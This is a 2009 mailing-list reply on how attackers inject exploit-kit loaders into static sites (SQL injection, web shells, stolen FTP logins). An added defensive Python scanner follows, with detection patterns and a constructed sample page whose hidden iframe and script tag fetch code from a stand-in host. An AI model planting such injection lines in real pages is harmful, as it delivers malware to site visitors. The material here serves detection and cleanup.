Malicious code just found on web server

Nick Chapman nicknetworks at gmail.com
Mon Apr 20 17:40:53 UTC 2009


On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngspook at gmail.com> wrote:

> I've run into this sort of attack before, where they change the page to load
> content from elsewhere; but I couldn't figure out how they managed to write
> to the sites' pages.  They were hosted on a commercial webhost, and so if it
> was a compromised host (which seemed like the only possibility to me), that
> didn't speak well for the hosting company.



SQLi is probably the most common way to inject code.  Shared databases
can lead to shared security problems.  It's also possible that the
hosting provider could be having other security issues that would
allow an attacker to directly edit the website in question.  Remote file
inclusions are also a popular way to modify a web page.  Include a web
shell, and then run a few commands to insert the malicious code into
the website.


> We were having issues with the company anyways, though; so I took down the
> site, sanitized the pages (and removed a bunch of junk), and put the site
> back up with another company.
>
> But if you figure out how they got write access to a static website, I'd
> love to hear it.


Compromised FTP credentials would be my guess.  They can be obtained
by brute force attacks or credential stealing trojans.


The obfuscation used by this exploit kit looked kind of familiar, but I
wasn't able to match it to any exploit kits I know of.  But it looks
like the guys at Arbor examined this at the beginning of the year:

http://asert.arbornetworks.com/2009/01/buy-buy-exploitation/

They're referring to it as Buy Buy due to the buybuy.html page.  Also
looks like a commenter at the article mentions that he had a problem
with this that was caused by compromised ftp accounts.

Of course, given how often exploit kits are copied, modified, merged,
etc., the Buy Buy kit could just be a relative of this one.


Regards,

-Nick
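As an added example (not code from the thread, from Nick, or from the Arbor write-up): a small Python scanner that walks a site's static pages looking for the injection artifacts the message describes, namely a hidden iframe pointing elsewhere, an obfuscated script loader of the eval/unescape kind, and a script pulled from a host the site does not normally use. The allowed-host list, the file extensions, and the two sample pages are assumptions constructed for the example; 198.51.100.7 is a documentation address, not a real host, and the heuristics are leads to inspect by hand, not proof of compromise.

```python
"""Scan static web pages for the kind of injected content discussed in the
thread: hidden iframes and obfuscated script blocks that pull an exploit
kit from elsewhere.  Heuristic only; treat hits as leads, not proof.
"""
import os
import re
from typing import List, Tuple

# Hosts the site is expected to load scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "example.com"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)
SCRIPT_BLOCK_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.IGNORECASE)

# Typical markers of the obfuscated loaders exploit kits inject into pages.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# A long run of %xx or \xNN escapes is the payload being hidden from grep.
ENCODED_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}){20,}|(?:\\x[0-9a-fA-F]{2}){20,}")


def _is_hidden_iframe(tag: str) -> bool:
    """Zero-sized, display:none, or pushed off-screen: nothing a visitor should see."""
    t = tag.lower()
    if re.search(r"\b(width|height)\s*=\s*['\"]?0(?:px)?(?![0-9])", t):
        return True
    if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", t):
        return True
    return bool(re.search(r"(left|top)\s*:\s*-\d{3,}", t))


def scan_html(text: str) -> List[Tuple[str, str]]:
    """Return (reason, evidence) pairs for suspicious content in one page."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        if _is_hidden_iframe(m.group(0)):
            findings.append(("hidden iframe", m.group(0)[:120]))
    for m in SCRIPT_SRC_RE.finditer(text):
        src = m.group(1)
        h = HOST_RE.match(src)
        if h and h.group(1).lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("external script", src))
    for m in SCRIPT_BLOCK_RE.finditer(text):
        body = m.group(1)
        hits = [k for k in OBFUSCATION_MARKERS if k in body]
        if ENCODED_RUN_RE.search(body):
            hits.append("long encoded run")
        if len(hits) >= 2:  # one marker alone is common in legitimate scripts
            findings.append(("obfuscated script", ", ".join(hits)))
    return findings


def scan_tree(root: str, exts=(".html", ".htm", ".php", ".js")) -> dict:
    """Walk a site root and map each file that has findings to its findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(exts):
                path = os.path.join(dirpath, n)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = scan_html(f.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample pages for the example (not real captured data).
CLEAN_PAGE = """<html><body><h1>Hi</h1>
<script src="http://www.example.com/site.js"></script>
<iframe src="/map.html" width="400" height="300"></iframe></body></html>"""

INJECTED_PAGE = CLEAN_PAGE + """
<iframe src="http://198.51.100.7/buybuy.html" width=0 height=0 style="visibility:hidden"></iframe>
<script>eval(unescape('%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%78%22%29%3c%2f%73%63%72%69%70%74%3e'));</script>
<script src="http://198.51.100.7/x.js"></script>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page))
```

Run scan_tree() against a copy of the document root pulled over the same FTP account that is suspected of being compromised; if the findings cluster on files whose modification times fall in one short window, that window is also where to look in the FTP logs for the login that wrote them.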



